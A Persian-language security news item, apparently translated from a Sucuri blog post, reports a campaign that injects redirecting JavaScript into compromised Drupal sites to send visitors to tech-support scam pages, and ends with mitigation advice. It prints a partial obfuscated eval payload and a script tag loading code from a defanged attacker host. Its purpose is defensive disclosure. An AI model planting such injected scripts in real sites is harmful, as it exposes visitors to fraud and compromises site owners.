پس از شناسایی برخی از آسیبپذیریهای دروپال، اکنون خبرهایی از آلودگیهای جدید در دروپال منتشر میشود. بیش از هزار وب سایت آلوده شناسایی شده است که کلاهبردارن با استفاده از این آسیبپذیری، کاربران را به صفحات فریبکاری Teach Support هدایت میکنند.
نحوه تزریق کد مخرب
صفحات آلوده حاوی کد جاوا اسکریپت زیر هستند که به فایلهای .tpl.php، .html.twig و.js تزریق میشود.
eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59));
اسکریپت از مسیر hxxps://js.localstorage[.]tk/s.js?crt=new تزریق میشود که وظیفه هدایت کاربر را برعهده دارد. این اسکریپت همچنین به مکانهای مختلف در پایگاه داده در قالب متن ساده تزریق میشود.
<script type="text/javascript" src="hxxps://js.localstorage[.]tk/s.js?qr=888"></script>
نکته: کد اسکریپت از طریق آدرس زیر نیز میتواند تزریق شود.
hxxp://193.201.224 .233/m.js?d=3
نسخه های دیگری از این کد نیز در وب سایت های مبتنی بر WordPress نیز می تواند یافت شود.
آلودگیهای مجدد
به دلیل اینکه هکرها نسخههای متعددی از فایلهای مخرب را ایجاد میکنند تا در صورت حذف یکی از آنها، دیگری جایگزین شود؛ لذا حذف کدهای مخرب جاوا اسکریپت از فایلهای آلوده و پایگاه داده به تنهایی کافی نیست. فایلهای جایگزین اغلب دارای اسامی تصادفی مانند “g.php”, “tonure.php“, “jooner.php“, “almio.php” هستند.
در کد زیر فایلهای .tpl.php, .html.twig, header.php, drupal.js جستجو میشود و کد جاواسکریپت مخرب به آنها تزریق میشود.
همانطور که در خطهای ۸ تا ۲۷ مشاهده میکنید، این کد تلاش میکند تا نرمافزارهای مخرب را به فایلهایی که از دایرکتوری جاری تا سه دایرکتوی بالای پرونده فعلی (../../ ..) وجود دارد تزریق کند. این کار به این معنی است که کد مخرب ممکن است همه سایتهای همسایه که حساب خود را با سایت هدف به اشتراک میگذارند آلوده کند.
برای جلوگیری از این تهدید، بروزرسانی و افزودن وصلههای جدید دروپال در دستور کار قرار گیرد
اقدامات برای مقابله
در این قسمت برخی از اقدامات لازم برای مقابله با این تهدید ارائه میشود:
- برای جلوگیری از این تهدید، بروزرسانی و افزودن وصلههای جدید دروپال در دستور کار قرار گیرد.
- پیدا کردن و حذف تمام دربهای پشتی
- حذف نرمافزارهای مخرب تزریق شده از فایلهای آلوده و دروپال و پایگاه داده
- و به طور کلی اگر اخبار مربوط به آسیبپذیریهای کشف شده را دنبال نمیکنید، یا سایت خود را پس از انتشار وصلههای جدید بروز نمیکنید، استفاده از یک فایروال وب سایت (WAF) که به طور فعال سایت شما را در برابر تهدیدات محافظت میکند انتخاب مناسبی است.
منبع: وبلاگ Sucuri
